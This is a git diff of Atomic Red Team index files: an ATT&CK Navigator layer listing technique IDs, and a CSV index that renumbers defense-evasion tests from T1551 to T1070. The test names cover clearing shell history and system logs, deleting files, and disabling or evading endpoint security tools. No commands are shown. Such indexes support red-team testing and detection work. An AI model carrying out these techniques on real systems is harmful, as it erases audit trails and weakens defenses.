"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 41fb8588..92123d49 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1551.001","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.005","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1551","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index ae8fcb15..05831798 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -213,18 +213,18 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
-defense-evasion,T1551.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1551.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1551.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1551.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1551.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1551.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1551.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1551.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
-defense-evasion,T1551.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
-defense-evasion,T1551.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
+defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
+defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
+defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLogId,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
@@ -262,16 +262,16 @@ defense-evasion,T1562.001,Disable or Modify Tools,20,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,21,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
-defense-evasion,T1551.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
-defense-evasion,T1551.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
-defense-evasion,T1551.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
-defense-evasion,T1551.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
-defense-evasion,T1551.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
-defense-evasion,T1551.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
-defense-evasion,T1551.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1551.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1551.004,File Deletion,9,Delete-PrefetchFile,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1551.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
+defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
+defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
+defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
+defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
